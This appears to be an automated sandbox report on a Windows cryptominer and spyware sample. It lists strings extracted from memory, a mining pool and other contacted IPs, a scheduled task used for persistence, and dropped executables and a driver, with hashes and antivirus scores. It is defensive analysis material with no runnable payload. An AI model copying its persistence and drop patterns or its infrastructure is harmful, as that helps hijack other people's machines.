                                                                                  http://tempuri.org/Entity/Id22AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://tempuri.org/Entity/Id23AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id24AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://xmrig.com/wizardconhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://tempuri.org/Entity/Id24ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735232254.000000000713C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://tempuri.org/Entity/Id1ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedAppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressingAppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://support.google.com/chrome/?p=plugin_shockwaveAppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://forms.reaAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/trustAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://tempuri.org/Entity/Id10AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://xmrig.com/benchmark/%sconhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id11AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id12AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id16ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://tempuri.org/Entity/Id13AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://tempuri.org/Entity/Id14AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://tempuri.org/Entity/Id15AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://tempuri.org/Entity/Id16AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/NonceAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://tempuri.org/Entity/Id17AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://tempuri.org/Entity/Id18AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://tempuri.org/Entity/Id5ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://tempuri.org/Entity/Id19AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDAppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsAppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://go.mic4mconhost.exe, 00000015.00000000.751481626.00000224D5CB2000.00000004.00000020.sdmp, conhost.exe, 00000015.00000002.809219081.00000224D5CAB000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://tempuri.org/Entity/Id10ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RenewAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://tempuri.org/Entity/Id8ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://support.google.com/chrome/?p=plugin_wmpAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                                  		high

                                                                                                                                  Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  45.82.70.152
                                                                                                                                  		unknownNetherlands
                                                                                                                                  		204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLfalse
                                                                                                                                  157.90.156.89
                                                                                                                                  		mine.bmpool.orgUnited States
                                                                                                                                  		766REDIRISRedIRISAutonomousSystemESfalse
                                                                                                                                  95.143.179.185
                                                                                                                                  		unknownRussian Federation
                                                                                                                                  		25560RHTEC-ASrh-tecIPBackboneDEtrue

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                  Analysis ID:553228
                                                                                                                                  Start date:14.01.2022
                                                                                                                                  Start time:14:09:20
                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 13m 39s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Sample file name:982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                  Number of analysed new started processes analysed:37
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • HDC enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.spyw.evad.mine.winEXE@39/7@2/3
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 54.5%
                                                                                                                                  HDC Information:
                                                                                                                                  • Successful, ratio: 67.9% (good quality ratio 55.5%)
                                                                                                                                  • Quality average: 46%
                                                                                                                                  • Quality standard deviation: 32%
                                                                                                                                  HCA Information:Failed
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Adjust boot time
                                                                                                                                  • Enable AMSI
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  Warnings:
                                                                                                                                  Show All
                                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                                                                                                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                  • Execution Graph export aborted for target 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, PID 6220 because there are no executed function
                                                                                                                                  • Execution Graph export aborted for target AppLaunch.exe, PID 5180 because it is empty
                                                                                                                                  • Execution Graph export aborted for target explorer.exe, PID 4876 because there are no executed function
                                                                                                                                  • Execution Graph export aborted for target explorer.exe, PID 6924 because there are no executed function
                                                                                                                                  • Execution Graph export aborted for target sistem.exe, PID 5576 because there are no executed function
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  14:10:36API Interceptor76x Sleep call for process: AppLaunch.exe modified
                                                                                                                                  14:10:47API Interceptor1x Sleep call for process: Microsoft.exe modified
                                                                                                                                  14:10:51API Interceptor1x Sleep call for process: conhost.exe modified
                                                                                                                                  14:10:53Task SchedulerRun new task: services64 path: C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  14:10:54API Interceptor2x Sleep call for process: services64.exe modified
                                                                                                                                  14:10:58API Interceptor1x Sleep call for process: sihost64.exe modified

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  No context

                                                                                                                                  Domains

                                                                                                                                  No context

                                                                                                                                  ASN

                                                                                                                                  No context

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  No context

                                                                                                                                  Dropped Files

                                                                                                                                  No context

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                                                                                                                                  Process:C:\Windows\System32\conhost.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):539
                                                                                                                                  Entropy (8bit):5.348465763088588
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPTxAIWzAbDLI4MNCIBTaDAWDLI4MWuCv:ML9E4Kr8sXE4+aE4Ks
                                                                                                                                  MD5:AD3DC4BDB13FFE4ABD214A6EB4E5A519
                                                                                                                                  SHA1:A2C3FCBCA3F40AE579E303AA8E8E2810860F088C
                                                                                                                                  SHA-256:EEA4FDD5FA39D6145F4C5ABFB3BEB63C1D750B2BBA95D5D9D52F245AA07DC02D
                                                                                                                                  SHA-512:50E0046F80823EB299545C16DD4A027A6294CC74294AE12D9A40F62FB6F1E92319511E90486427F2FEE44E6BB3E1317EA582284FB6CD82CA1BE9B5F3614BBE12
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2291
                                                                                                                                  Entropy (8bit):5.3192079301865585
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:MOfHK5HKXAHKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHK1HjHKoLHG1qHqH5HX:vq5qXAqLqdqUqzcGYqhQnoPtIxHbq1Ds
                                                                                                                                  MD5:A7DF088AA34326DF55EBEABB6C9550BE
                                                                                                                                  SHA1:452C8EF09C52F0DF853D97EFFF159AA56625EAEA
                                                                                                                                  SHA-256:4E15698573516EBEBA9F6BE8094135F3CA810D48FDCDC7E827463EDB2AFCECE4
                                                                                                                                  SHA-512:8263C8D9F26878E088AACBFCCB6C545AEB5B11DF3422DD276AC1A96AA3E66CE9F54802E4EE3DE5B1C1E680364901F99FCB1169BA23E3878B7B5114B2BC0BE871
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=
                                                                                                                                  C:\Users\user\AppData\Local\Temp\Microsoft.exe
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2233856
                                                                                                                                  Entropy (8bit):7.999686027647644
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:49152:4zEksk2+pV73APQ1HwNPT+p0+L+wupSPtabrvoOmRQj3duUbgQs0r:4zXU+r3v9w5T+p0+L/upCSrfxuUkQ1
                                                                                                                                  MD5:AFA47609E27DB892A6E3597A88C5645A
                                                                                                                                  SHA1:EBF7F62E5689F11BFA334A8E40804CA8B32C8339
                                                                                                                                  SHA-256:529043B5FCEF43623835319764499B2A4DDBAE2477697F22AADA0E09352B83C5
                                                                                                                                  SHA-512:B3E906A04B22701F0C4938433B5DB7ABA1DBD894E9D7FBC9DD1CC4FE685351CF9D06A05B6504A4E79A7193C69B1C619D6EEF20C0816C79875A54827E12BF5E28
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Virustotal, Detection: 53%, Browse
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P".....z.".....................................................0'".<............@".....................................................................l'"..............................text............................... ..`.rdata..n.!..0....!.................@..@.bss.........0"..........................pdata.......@".......".............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Process:C:\Windows\System32\conhost.exe
                                                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2233856
                                                                                                                                  Entropy (8bit):7.999686027647644
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:49152:4zEksk2+pV73APQ1HwNPT+p0+L+wupSPtabrvoOmRQj3duUbgQs0r:4zXU+r3v9w5T+p0+L/upCSrfxuUkQ1
                                                                                                                                  MD5:AFA47609E27DB892A6E3597A88C5645A
                                                                                                                                  SHA1:EBF7F62E5689F11BFA334A8E40804CA8B32C8339
                                                                                                                                  SHA-256:529043B5FCEF43623835319764499B2A4DDBAE2477697F22AADA0E09352B83C5
                                                                                                                                  SHA-512:B3E906A04B22701F0C4938433B5DB7ABA1DBD894E9D7FBC9DD1CC4FE685351CF9D06A05B6504A4E79A7193C69B1C619D6EEF20C0816C79875A54827E12BF5E28
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Virustotal, Detection: 53%, Browse
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P".....z.".....................................................0'".<............@".....................................................................l'"..............................text............................... ..`.rdata..n.!..0....!.................@..@.bss.........0"..........................pdata.......@".......".............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\sistem.exe
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3514792
                                                                                                                                  Entropy (8bit):7.99852479553142
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:98304:sMcpY7WYnC7PyUMxgD9WbqlhsHh4TD5nzQX+:sfmWYniqUMxgD3l6CTDg+
                                                                                                                                  MD5:14A6FC2FF495BE7077B8AA7602606BB7
                                                                                                                                  SHA1:0B985B103E0AE6C21B9AC1DB8DFFFB3A68744348
                                                                                                                                  SHA-256:F7E9394DEB6140CCB3DF12A53E94E8B2D28DA6F7C9D0143736E3067E5AA88765
                                                                                                                                  SHA-512:AF599C8CF10341E71DDA685B2C0FFC268AD3F37854EF20B69E04B4661720AC55580EF6059CAF7A14CC0DEEB2405E1DBEDA67A241B59AF23E402E690C3AAECF6E
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: Metadefender, Detection: 31%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a.....................T.......0............@...........................U......D7.....................................|.P. .....P..............~5..#..................................................................................................C...........................@................0...z..................@....................r...~..............@............ ..........................@...........>'..........................@.............2......./.................@....rsrc....0....P..$....0.............@....2w140TT......P.......0.............@....adata........U......~5.............@...........................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
                                                                                                                                  Process:C:\Windows\System32\conhost.exe
                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):14544
                                                                                                                                  Entropy (8bit):6.2660301556221185
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                  Process:C:\Windows\System32\conhost.exe
                                                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):31232
                                                                                                                                  Entropy (8bit):7.579054897335154
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:bhq1ifn21Lqk0qRqHobJcA7R1TSR3N6h0m4:F7f21LqrqJJF7R1TSBNQ4
                                                                                                                                  MD5:A5D983222C60F4DCAE743F8E34806580
                                                                                                                                  SHA1:F55DC0A74F3CB665F4CB359D2A953244035B389F
                                                                                                                                  SHA-256:E6463D8B80C83D55FE18A9C308B1DBBEBDAD5E40CC52C9F91CF9A3C1D4CDDE84
                                                                                                                                  SHA-512:542E702017F4A23879090F1CCB8215CBE43DF1B765BEC7C19BC803AC4BD6D947CC96833B4095B9CC7ED5029BE8DBAED9A40D0D6CB83D638F59B80893CBFA4946
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........`......."........@.............................................................................................0...<...................................................................................l................................text............................... ..`.rdata..n]...0...^..................@..@.bss.....................................pdata...............x..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):7.9976199230870035
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                                                                                                                                  File size:3609088
                                                                                                                                  MD5:c7f9efb09db59923b3f96fd1ef2f0873
                                                                                                                                  SHA1:43ee2579fef8ff0c3a5d53f3dc4306bbdf04d484
                                                                                                                                  SHA256:982d4ea5fee5b8e551d40cb07272e1bcf707edff1001dd491ac614fdef1fa149
